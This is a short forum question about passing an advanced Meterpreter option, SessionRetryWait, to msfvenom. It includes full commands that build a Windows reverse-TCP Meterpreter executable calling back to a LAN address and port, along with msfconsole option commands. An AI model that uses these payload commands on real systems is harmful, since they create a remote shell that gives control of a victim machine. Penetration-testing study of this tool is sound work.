# How can I include exploit advanced in msfvenom?

Tags: linux, kali-linux, metasploit

How can I include advanced options with msfvenom

This is usually how I create the files

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.52 LPORT=4567 --platform windows -f exe -o file.exe
```

Example of advanced options:

```
use windows/meterpreter/reverse_tcp
show advanced
set SessionRetryWait 30
```

For example, I want to add a `SessionRetryWait` modification with msfvenom

I tried to solve it this way but I didn't succeed

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.52 LPORT=4567 SessionRetryWait 30 --platform windows -f exe -o file.exe
```

How can I include this with msfvenom?